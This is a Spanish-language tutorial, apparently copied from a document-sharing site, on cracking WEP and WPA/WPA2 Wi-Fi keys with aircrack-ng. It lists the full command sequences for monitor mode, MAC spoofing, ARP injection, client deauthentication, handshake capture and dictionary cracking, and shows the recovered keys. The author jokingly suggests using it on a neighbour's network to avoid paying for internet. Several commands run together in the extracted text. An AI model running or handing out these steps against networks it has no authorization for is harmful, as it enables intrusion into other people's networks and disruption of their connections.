Tutorial de Aircrack Para Wep y Para Wpa

6
TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA- WPA2 con Ubuntu 8.10 y tarjeta SMCWUSB-G con chipset Zydas 1211 con driver zd1211r, y con Wifislax 3.1 TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA-WPA2 con Ubuntu 8.10 y tarjeta SMCWUSB-G con chipset Zydas 1211 con driver zd1211r, y con Wifislax 3.1 ATENCION PREGUNTA: Siendo jander tanto el nombre de la red a atacar como el de el archivo de paquetes capturados, y 00:13:F7:1D:B6:CF la MAC del punto de acceso a atacar, dígase su contraseña WEP y WPA. Antes de empezar : decir que todo funciona igual de bien en Wifislax, excepto que la tarjeta de red inalambrica usb SMCWUSB-G tuve que que quitarla y volverla a conectar una vez que estuve dentro de Wifislax,

Transcript of Tutorial de Aircrack Para Wep y Para Wpa

Page 1: Tutorial de Aircrack Para Wep y Para Wpa

TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA-WPA2 con Ubuntu 8.10 y

tarjeta SMCWUSB-G con chipset Zydas 1211 con driver zd1211r, y con Wifislax

3.1  

  TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA-WPA2 con Ubuntu 8.10 y tarjeta SMCWUSB-G con chipset Zydas 1211 con driver zd1211r, y con Wifislax 3.1ATENCION PREGUNTA:

Siendo jander tanto el nombre de la red a atacar como el de el archivo de paquetes capturados, y 00:13:F7:1D:B6:CF la MAC del punto de acceso a atacar, dígase su contraseña WEP y WPA.

Antes de empezar : decir que todo funciona igual de bien en Wifislax, excepto que la tarjeta de red inalambrica usb SMCWUSB-G tuve que que quitarla y volverla a conectar una vez que estuve dentro de Wifislax, sin configuración, ni necesita drivers ni nada, simplemente quitarla y volverla a pinchar y ya la reconoce Wifislax, no hace falta ayuda chipset ni lanzadores ni ná. En ubuntu 8.10 no hay que hacer nada, ya reconoce la tarjeta y no hay que buscar drivers ni kernel ni otras cosas.

Page 2: Tutorial de Aircrack Para Wep y Para Wpa

Espero que le pueda ayudar a alguien con chipset zydas como a mi me ayudaron los foros, videos, tutos etc de www.foro.seguridadwireless.net , http://foro.el-hacker.com , http://www.youtube.com/watch?v=whYDVSzvJQ8 (estos tres videos recomiendo que se vean antes de empezar, sobre todo los que no tengan ni idea de auditorías y también los que les pique el gusanillo de linux) y más gracias a tantos otros que no hay espacio xd.

CUATRO CONCEPTOS BASICOS :

PRIMER REQUISITO IMPRESCINDIBLE :

Ver el tutorial de Alfonso Cruz para sacar claves Wep

SEGUNDOS REQUISITOS NO IMPRESCINDIBLES :

Hay que saber, llegados a este punto, conceptos como DATA, ARP, IVS, y HANDSHAKE, SINO VUELVE A Ver el tutorial de Alfonso Cruz para sacar claves Wep Sino. Aquí te los explico yo, como siempre, en cristiano

DATA : son paquetes muy buenos, muy bonitos y muy entrañables, de hecho indican que es una red que puedes auditorizar con posibles buenos resultados, los veras despues de hacer un airodum-ng.

PARA AUDITORIAS WEP : NECESITAS 120.000 ARP

ARP : es lo que tienes que capturar en un ataque wep, un paquete muy guai, necesitas de 40000 a 120000.

IVS : son vectores de inicializacion de los paquetes que te sirven para sacar la clave wep, también necesitas 80000 o 120000, y también son para “asuntos” wep.

PARA AUDITORIAS WPA-WPA2 SÓLO NECESITAS UN PAQUETE LLAMADO HANDSHAKE Y NO 120.000 COMO PARA WEP

HANDSHAKE:

Traducido es “apreton de manos”, o sea el momento en que ordenata y punto de acceso se “vuelven a saludar” y se mandan la clave, al reconocerse como “colegas”, ese es el momento en que el airodump captura ese preciado handshake que contiene laclave, buff mi espalda, me duele de tanto escribir xd, este preciado handshake es fundamental para el ataque wpa-wpa2, porque es el que guarda la clave wpa-wpa2, despues, simplemente hay que compararlo con el diccionario y voilà.

DICCIONARIO(WORDLIST) :

La pena de todo esto, infelices que habeis leído hasta aquí, es que una clave wpa-wpa2 no se puede capturar a no ser que sea del tipo manolin233 o tobi8876, o que tengas un diccionario acojonante, y de esos, desafortunadamente todavía no existen, si sabeis de alguno me lo mandais a [email protected]

Page 3: Tutorial de Aircrack Para Wep y Para Wpa

Ahora en serio, y último consejo:

El diccionario deberá estar guardado en la carpeta donde estas haciendo todo: En Wifislax es: / rootEn Ubuntu la del usuario, pero vale cualquiera mientras sepas donde tienes el diccionario, lo mejor para los novatos es tener el diccionario en la misma carpeta dónde haces todo).

LO DEL ATAQUE WPA-WPA2 CON CLIENTE :

Vamos a ver, que como intentes atacar el router de un “amigo”, que en ese momento no tenga conectado un pc a su router y con la mula puesta, pues eso, que lo llevas claro, te llevaría siglos, o toda tu paciencia, la cual es mejor dedicar a tratar mejor a tu vecino y pedirle la clave, para que amablemente la comparta contigo y llegar juntos a pagar menos a TIMOFONICA xd.

INDICE DE COMANDOS USADOS(por orden de aparición y uso):

Comandos para WEP:

ifconfigiwconfigifconfig wlan0 upairmon-ng start wlan0iwconfigifconfig mon0 downmacchanger -m 00:11:22:33:44:55 mon0ifconfig mon0 upairodump-ng mon0

pulsar control-c para parar airodump

airodump-ng mon0 -w jander -c 6aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0aireplay-ng -3 -b 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0aircrack-ng jander*.cap

Comandos para WPA :

ifconfigiwconfig ifconfig wlan0 up airmon-ng start wlan0iwconfigairodump-ng -c 6 --bssid 00:13:f7:1d:b6:cf -w jander mon0aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0 aircrack-ng -w dictionary_spanish.dic -0 jander*.cap

Nota : el ataque se realizó sobre mi router Smcwbr-14-g, con la mula conectada desde el cliente en el caso Wpa, con un diccionario, capturando el handshake en 5 minutos.En el caso de la clave WEP, se hizo falseando la MAC con macchanger, tambien con tráfico, y en unos dos minutos empezó a inyectar como loco, en 10 minutos tenía 200000 arps xd.

SACANDO CLAVE WEP

Page 4: Tutorial de Aircrack Para Wep y Para Wpa

1er PASO : Configurar la tarjeta en modo monitor: AIRMON

ifconfigiwconfigifconfig wlan0 upairmon-ng start wlan0airmon-ng start mon0ifconfig mon0 downmacchanger -m 00:11:22:33:44:55 mon0 (como explica Alfonso Cruz en sus tres magistrales videos que recomiendo ver antes de empezar a meter comandos en la consola http://www.youtube.com/watch?v=whYDVSzvJQ8 ).

ifconfig mon0 up

2º PASO: Capturar paquetes: AIRODUMP

airodump-ng mon0 (localizas la red y apunta su mac y su canal)control-c(Para parar el airodump)airodump-ng mon0 -w jander -c 6 (lo dejas capturando)

3er PASO: Autentificarse : AIREPLAY, en otra consola

aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0si la autentificacion es correcta, debe decir sucessful :) pasas al siguiente paso.

4º PASO : Inyectar paquetes: AIREPLAY

aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon0 y cuando llegues a 120000 arps:

5º PASO: Buscar clave en el archivo de captura jander.cap : AIRCRACK

aircrack-ng jander*.cap

KEY FOUND! [ 5A:30:30:30:32:43:46:42:37:35:41:38:32 ] (ASCII: Z0002CFB75A82 )

FIN

SACANDO CLAVE WAP-WAP2

1er Paso : Configurar la tarjeta :AIRMON

ifconfigiwconfig ifconfig wlan0 upairmon-ng start wlan0airmon-ng start mon0

2º Paso : Capturar paquetes: AIRODUMP

airodump-ng mon0cuando veas tu punto de acceso a atacar, control-c y en otra consola :airodump-ng -c 6 --bssid 00:13:F7:1D:B6:CF -w jander mon0

3er Paso: Deautentificar : AIREPLAY en otra consola

aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0

Page 5: Tutorial de Aircrack Para Wep y Para Wpa

Después de usar este comando, fijaros de vez en cuando en la pantalla del airodump, ARRIBA A LA DERECHA, y ahí debe aparecer el preciado handshake y a continuación, el 4º paso.

4º Paso : Buscar la clave en el Dicionario :AIRCRACK,en otra consola

aircrack-ng -w dictionary_spanish.dic -o jander*.cap

KEY FOUND! [ CF:CF:CF:CF:CF ]

FIN

Esperando sepan disculpar mi mala letra y los posibles errores, que podeís remitir a [email protected], se despide de ustedes [email protected]